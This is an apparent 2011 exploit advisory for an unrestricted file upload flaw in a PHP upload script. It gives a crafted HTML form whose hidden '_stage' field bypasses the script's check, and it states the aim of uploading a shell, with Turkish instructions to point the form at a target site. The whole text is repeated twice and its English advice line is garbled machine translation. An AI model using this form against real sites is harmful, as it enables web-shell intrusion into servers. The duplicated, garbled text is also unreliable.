auth0r : onur TÜRKEŞHAN
authed date : 24.08.2011
script desc,and link : http://phpbox.5gigs.net/2011/05/14/upload-file-with-form/
adviCe : NOTWITHSTANDING input manually coded as 1 out of invisible when you care about ourselves, not the problem and will upload shell.
Buqdivice : kodumuzu .html olarak kaydedin ve site.com yerlerini degistirin.
buqc0de :
<form enctype=multipart/form-data method=POST action=site.com/upload.php>
File to Upload: <input name=my_file type=file/>
<input type=hidden name=MAX_FILE_SIZE value=9999/>
<input type=hidden name=_stage value=1>
<input type=submit value=Upload/>
authed date : 24.08.2011
script desc,and link : http://phpbox.5gigs.net/2011/05/14/upload-file-with-form/
adviCe : NOTWITHSTANDING input manually coded as 1 out of invisible when you care about ourselves, not the problem and will upload shell.
Buqdivice : kodumuzu .html olarak kaydedin ve site.com yerlerini degistirin.
buqc0de :
<form enctype=multipart/form-data method=POST action=site.com/upload.php>
File to Upload: <input name=my_file type=file/>
<input type=hidden name=MAX_FILE_SIZE value=9999/>
<input type=hidden name=_stage value=1>
<input type=submit value=Upload/>